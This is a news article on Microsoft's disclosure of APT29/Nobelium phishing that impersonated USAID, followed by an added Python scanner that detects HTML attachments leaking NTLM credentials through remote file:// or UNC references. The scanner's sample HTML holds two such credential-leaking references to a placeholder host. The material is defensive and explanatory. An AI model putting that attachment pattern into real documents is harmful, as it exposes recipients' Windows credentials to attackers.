Bleeping Computer: Microsoft: Russian Hackers Used 4 New Malware in USAID Phishing - By Lawrence Abrams - May 29, 2021
Microsoft states that a Russian hacking group used four new malware families in recent phishing attacks impersonating the United States Agency for International Development (USAID).
Thursday night, the Microsoft Threat Intelligence Center (MSTIC) disclosed that the Russian-backed hacking group APT29, also known as Nobelium, had compromised the Constant Contact account for USAID.
Using this legitimate marketing account, the threat actors impersonated USAID in phishing emails sent to approximately 3,000 email accounts at more than 150 different organizations, including government agencies and organizations devoted to international development, humanitarian, and human rights work.
New malware used by Nobelium
In a second blog post released Friday night, Microsoft described four new malware families used by Nobelium in these recent attacks.
The four new families include an HTML attachment named 'EnvyScout', a downloader known as 'BoomBox', a loader known as 'NativeZone', and a shellcode downloader and launcher named 'VaporRage'.
EnvyScout
EnvyScout is a malicious HTML/JS file attachment used in spear-phishing emails that attempts to steal the NTLM credentials of Windows accounts and drops a malicious ISO on a victim's device.
Distributed as a file named NV.html, the attachment, when opened, attempts to load an image from a file:// URL. When it does, Windows may send the logged-in user's NTLM credentials to the remote host, which attackers can capture and brute-force offline to recover the plaintext password.
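The EnvyScout behaviour described above (an HTML attachment whose image reference points at a file:// or UNC path, so that opening it triggers an outbound NTLM authentication) is something mail gateways and attachment scanners can check for statically. The following is an added example, not code from the article or from Microsoft's post: it walks an HTML attachment's auto-fetched attributes (src, href, data and similar) and reports any that would make Windows connect to a remote host via file:// or a UNC path. The sample HTML and the address 203.0.113.10 (a documentation range) are constructed for the example.

```python
"""Flag HTML attachments that reference remote file:// or UNC resources.

Added example; not the article's or Microsoft's code. The sample document and
the host 203.0.113.10 are constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Attributes the browser or the OS resolves automatically when the page renders.
AUTO_FETCH_ATTRS = {"src", "href", "data", "background", "poster", "action"}

# Matches the host part of //host/share/... or \\host\share\... references.
UNC_RE = re.compile(r"^(?:\\\\|//)([^\\/]+)[\\/]")


def remote_file_host(value: str):
    """Return the host a file:// or UNC reference would connect to, else None.

    Local references such as file:///C:/path are not reported; only references
    that name another machine (the pattern that leaks an NTLM authentication).
    """
    v = value.strip()
    parsed = urlparse(v)
    if parsed.scheme.lower() == "file":
        if parsed.netloc:                     # file://host/share/x
            return parsed.netloc
        m = UNC_RE.match(parsed.path)         # file:////host/share/x
        return m.group(1) if m else None
    if not parsed.scheme:                     # bare UNC path \\host\share\x
        m = UNC_RE.match(v)
        if m:
            return m.group(1)
    return None


class RemoteResourceFinder(HTMLParser):
    """Collect (tag, attribute, host) for every remote file/UNC reference."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if value is None or name.lower() not in AUTO_FETCH_ATTRS:
                continue
            host = remote_file_host(value)
            if host:
                self.findings.append((tag, name, host))


def scan_html(html: str):
    """Return a list of (tag, attribute, host) findings for the given HTML."""
    parser = RemoteResourceFinder()
    parser.feed(html)
    parser.close()
    return parser.findings


# Constructed sample: one benign HTTPS image, one local file reference, and
# two references that would trigger an outbound SMB/WebDAV connection.
SAMPLE_HTML = r"""<html><body>
<p>Please review the attached notice.</p>
<img src="https://example.invalid/logo.png">
<img src="file://203.0.113.10/share/pixel.png">
<a href="\\203.0.113.10\docs\notice.pdf">Open</a>
<img src="file:///C:/Windows/Web/Wallpaper/local.jpg">
</body></html>"""


if __name__ == "__main__":
    for tag, attr, host in scan_html(SAMPLE_HTML):
        print(f"remote file reference: <{tag} {attr}=...> -> host {host}")
```

Findings like these are a strong signal that an HTML attachment is trying to force an authentication to an outside host; the usual network-side mitigation is to block outbound SMB (TCP 445) and WebDAV from workstations to the internet, so that even an opened attachment cannot deliver the NTLM exchange.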